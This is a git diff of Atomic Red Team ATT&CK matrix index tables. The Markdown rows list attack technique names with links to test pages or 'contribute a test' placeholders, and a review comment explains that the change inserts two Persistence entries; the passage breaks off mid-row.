[Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | 
System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service 
Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | | +| | [Visual Basic](../../T1059.005/T1059.005.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Emond](../../T1546.014/T1546.014.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Windows Management Instrumentation](../../T1047/T1047.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) 
| [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launch Agent](../../T1543.001/T1543.001.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launchd](../../T1053.004/T1053.004.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Local Accounts](../../T1078.003/T1078.003.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | | +| | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | | +| | | 
Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | | +| | | [Office Application Startup](../../T1137/T1137.md) | [Port Monitors](../../T1547.010/T1547.010.md) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Password Filter DLL](../../T1556.002/T1556.002.md) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | +| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | +| | | Path Interception by PATH Environment Variable [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | +| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | +| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | +| | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | +| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | 
Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | +| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | +| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Systemd Timers](../../T1053.006/T1053.006.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | +| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | | +| | | Scheduled Task/Job [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | | +| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | | +| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | +| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | | +| | | [Startup Items](../../T1037.005/T1037.005.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | | +| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | | +| | | 
[Systemd Service](../../T1543.002/T1543.002.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | | +| | | [Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | | | | | [Trap](../../T1546.005/T1546.005.md) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Web Shell](../../T1505.003/T1505.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Windows Service](../../T1543.003/T1543.003.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Process 
Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | | -| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | | +| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Web Shell](../../T1505.003/T1505.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Windows Service](../../T1543.003/T1543.003.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | | +| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](../../T1055/T1055.md) | | | | | | | | | | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | | | | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 843aac23..2448302b 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
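Review bot: the rewritten rows in this hunk differ from the removed ones only by two insertions in the Persistence column, `[Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)` and `XDG Autostart Entries [CONTRIBUTE A TEST]`, which push every later Persistence cell down one row while the Defense Evasion cells beside them are repeated verbatim; the row-wise layout turns a two-entry change into a rewrite of a dozen lines, so a reviewer cannot tell at a glance whether any other column moved. If the generator can sort and emit each tactic column independently, or at least note the inserted technique names in the commit body, small additions like this one would produce a diff that is checkable by eye.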
@@ -3,57 +3,61 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit 
DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | 
Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 